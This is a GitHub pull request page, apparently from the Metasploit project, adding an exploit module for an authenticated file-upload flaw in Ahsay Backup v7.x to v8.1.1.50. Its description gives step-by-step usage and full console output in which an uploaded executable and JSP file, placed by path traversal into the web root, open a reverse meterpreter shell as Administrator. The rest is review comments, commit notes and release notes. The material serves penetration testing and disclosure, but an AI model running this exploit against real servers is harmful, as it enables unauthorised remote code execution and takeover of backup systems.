Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Ahsay backup v7.x - v8.1.1.50 file upload #12095

Merged
merged 9 commits into from
Jul 22, 2019
Merged

Ahsay backup v7.x - v8.1.1.50 file upload #12095

merged 9 commits into from
Jul 22, 2019

Conversation

Wietsman
Copy link
Contributor

@Wietsman Wietsman commented Jul 16, 2019
edited
Loading

This exploit will upload a file to the server, it is possible to change the path and upload it in a directory that is accessible through the webserver. For this to work a valid user account is necessary, but trial accounts are enabled by default and an account can be created this way.

Installation if the Ahsay Backup:

  • Install Windows server
  • download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
  • Install cbs-win.exe on Windows server
  • Start the application ( I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat)

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/ahsay_fileupload
  • enable create trial account set CREATEACCOUNT true
  • set RHOST set RHOST 172.16.238.175
  • set LHOST set LHOST 172.16.238.235
  • run exploit run
  • We should receive a meterpreter shell.

msfconsole output

msf > use exploit/windows/misc/ahsay_fileupload
msf exploit(windows/misc/ahsay_fileupload) > show options

Module options (exploit/windows/misc/ahsay_fileupload):

   Name           Current Setting            Required  Description
   ----           ---------------            --------  -----------
   CREATEACCOUNT  false                      no        Create Trial account
   PASSWORD       Ahsay01!                   yes       Password to Ahsay
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                     yes       The target address
   RPORT          443                        yes       The target port (TCP)
   SSL            true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                          yes       Path to Ahsay
   UPLOADPATH     ../../webapps/cbs/help/en  no        Payload Path
   USERNAME       ahsay01                    yes       Username to Ahsay
   VHOST                                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator

bcoles
bcoles reviewed Jul 16, 2019
View reviewed changes
Copy link
Contributor

@bcoles bcoles left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

syntax and style

modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
modules/exploits/windows/misc/ahsay_backup_fileupload.rb Outdated Show resolved Hide resolved
@asoto-r7 asoto-r7 self-assigned this Jul 16, 2019
Wietsman and others added 4 commits July 16, 2019 22:37
@bcoles bcoles added docs and removed needs-docs labels Jul 17, 2019
Wietse Boonstra and others added 4 commits July 18, 2019 10:54
#12095 Fixed issue with function naming.
2b7d6e0 
Added random username and password generating
@Wietsman
#12095 Fixed Password complexity generation
e26b650 
#12095 Fixed trial account creation
#12095 Fixed calling functions
@Wietsman
#12095 Added cleaning up of trial account and dropper files.
71da3b7
@Wietsman
#12095 added version check if vulnerable
3b08ed8 
#12095 cleaned up the code
#12095 added more output
#12095 added comments
@asoto-r7
Copy link
Contributor

@Wietsman : I just wanted to say it's been a pleasure working with you via the Metasploit Slack and I appreciate your willingness to add a version check and account cleanup. Thanks for the module!

@asoto-r7 asoto-r7 merged commit 3b08ed8 into rapid7:master Jul 22, 2019
asoto-r7 added a commit that referenced this pull request Jul 22, 2019
@asoto-r7
Land #12095, Ahsay backup v7.x - v8.1.1.50 file upload
6b60832
msjenkins-r7 pushed a commit that referenced this pull request Jul 22, 2019
@asoto-r7 @msjenkins-r7
Land #12095, Ahsay backup v7.x - v8.1.1.50 file upload
466a4a7
@jmartin-tech
Copy link
Contributor

jmartin-tech commented Jul 25, 2019
edited by tdoan-r7
Loading

Release Notes

The ahsay_fileupload module has been added to the framework. It exploits an authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50.

@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 6, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

Assignees

@asoto-r7 asoto-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@Wietsman @asoto-r7 @jmartin-tech @bcoles @tdoan-r7